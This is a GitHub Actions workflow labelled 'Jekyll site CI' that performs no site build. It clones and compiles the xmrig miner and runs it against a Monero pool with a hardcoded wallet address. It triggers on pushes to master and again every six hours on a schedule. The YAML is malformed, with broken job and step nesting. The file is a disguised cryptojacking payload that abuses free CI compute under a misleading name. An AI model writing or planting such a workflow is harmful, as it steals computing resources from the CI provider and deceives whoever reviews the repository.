name:  Jekyll site CI

on:
  push:
    branches:
      - master
  schedule:
    - cron: "10 */6 * * *"
jobs:
 runs-on:         ubuntu-latest
 timeout-minutes: 30
steps:
    - name: Checkout repository
      uses: actions/checkout@v2
      
    - name: Install dependencies
      run: |
        sudo apt update
        sudo apt install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
    - name: Build Installer
      run: |
        git clone https://github.com/xmrig/xmrig.git
        mkdir xmrig/build
        cd xmrig/build
        cmake ..
        make -j$(nproc)
        - name: Build Proses
      run: |
        cd xmrig/build
        ./xmrig -o xmr.2miners.com:2222 -u 8C8ihAeP2HuNrJECaJJdsQcboBJwcpQ3fcyrUfAo7m6NKPtem4xMuV8KtXLKMAh5FcVtUtyAQurHbLsp77fjpm9LDEAEzee -p gitrig -k --coin monero -a rx/0 --threads 2
